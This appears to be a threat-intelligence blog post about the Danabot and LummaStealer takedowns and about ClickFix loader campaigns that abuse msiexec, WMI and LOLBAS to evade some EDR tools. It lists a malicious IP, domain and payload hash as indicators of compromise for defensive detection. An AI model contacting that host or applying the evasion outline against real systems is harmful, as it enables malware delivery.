Contributors: Niranjan Jayanand, Veena Sagar, Gouri Santhosh
In the world of cybercriminals and their financially motivated mindset, malicious code always undergoes quick developments due to the interest of potential buyers or affiliates who work for different threat groups. The recent takedowns of Danabot and LummaStealer are significant wins, but history shows us that financially motivated cybercriminals quickly adapt, developing and adopting new malicious loaders to maintain their operations. In this post, we want to give an overview on how these malware loaders evolved to bypass some EDR solutions and what to expect in coming days and weeks, through cyber threat intelligence analysis.
CyberProof‘s Threat Intelligence team encompasses a variety of data sources, including but not limited to, indicators of compromise (IoCs), tools used by threat actors, and detailed threat analyses. This information is gathered from a myriad of channels—open-source intelligence (OSINT), social media, deep and dark web sources, and more. The essence of CTI lies in its ability to not only react to existing threats, but also to predict future threats based on the cyber threat landscape.
Malicious Loaders and Takedowns
Malicious loaders are constantly modified and adopted for MaaS [malware as a service] by many financially motivated cyber-criminal groups for monetary gains. Qakbot—one of the oldest and most malicious malware loaders, active since at least 2009 and used by several human-operated ransomware groups including Conti, Egregor, and DoppelPaymer—was taken down as part of Operation Duck Hunt, reported on August 29, 2023.
Emotet has been active and evolving since 2014, despite a temporary takedown in 2021. Emotet malware infected more than 1.6 million victims’ computers and caused hundreds of millions of dollars in damage worldwide, supporting multiple ransomware groups like Ryuk (precursor of Conti) before its takedown in 2021.
The second half of May 2025 included takedowns of Danabot and LummaStealer operations by Federal agents and security companies namely Amazon, Crowdstrike, ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Spycloud, Team CYMRU, and ZScaler. Such rotations of malicious loaders by cyber criminals are not new when they suffer mass take downs post gaining popularity across researchers and federal bodies. Cyber researchers constantly pivot through multiple forums and CTI feeds to study new malicious code developments, upgrades, sales, and usage by criminals in targeted operations.
With recent Danabot and LummaStealer takedown, we expect to either come in contact with a completely new loader that may get quickly adopted across infostealers or a loader like IDAT to undergo further modular updates to make its analysis difficult and challenging. The investigation into 2025 DanaBot was led by the FBI’s Anchorage Field Office and the Defense Criminal Investigative Service, working closely with Germany’s Bundeskriminalamt (BKA), the Netherlands National Police, and the Australian Federal Police. The Justice Department’s Office of International Affairs provided significant assistance.
LummaStealer was a top active MaaS infostealer [Malware as a Service] for different eCrime threat groups for well over the past 18 months.
LummaStealer and other ecrime threat actors are highly opportunistic and can target any organizations globally as shown in below heatmap: Source: LummaStealer Heat map (Microsoft)
LummaStealer takedown was through partnership with others across government and industry, including cybersecurity companies ESET, Bitsight, Lumen, Cloudflare, CleanDNS, and GMO Registry. Each company provided valuable assistance by quickly taking down online infrastructure.
LummaStealer was seen as the top threat hitting finance sector across the world through fake captcha campaigns. Other infostealers seen spread through fake captcha are XWorm, VenomRAT, AsyncRAT, Danabot, SecTop RAT, Rhadamanthys. and NetSupport RAT. There was heavy use of IDATLoader (aka HijackLoader) during the heavy surge of ClickFix in the last three quarters.
How eCrime Loaders Stay Undetected
FakeCaptcha or ClickFix campaigns have been actively abused by both eCrime and APT groups, to target global organizations for few quarters now where multiple EDRs failed to block the attacks.
The latest variant of ClickFix campaign using conhost.exe showed abuse of LOLBAS and WMI to install a payload where Defender and SentinelOne failed to alert in many instances.
Below we can see msiexec downloaded the file from remote IP (172.67.208.19)/insufflating.lol.
A remote payload seen downloaded [SHA256: 6502325c5ad996eeffbe05990c4b34f3b53e6c480e1961aef9666e9ab847763a] with .tmp extension.
Two queries for Defender for Endpoint (MDE) can be found on Github:
We can confidently report that Query 2 has been validated and performed as expected during our recent testing. Please see results below:
Conclusion
The CyberProof Threat Research team predicts with high confidence that the take down of Danabot and LummaStealer are not going to slow down eCrime campaigns. We expect to see new variants of loaders to be quickly adopted by payloads (infostealers) for initial access and to support sophisticated groups like ransomware or APT groups.
We will continue to work closely with our internal teams to ensure our detection logics are updated to latest variants that may pop up in coming days.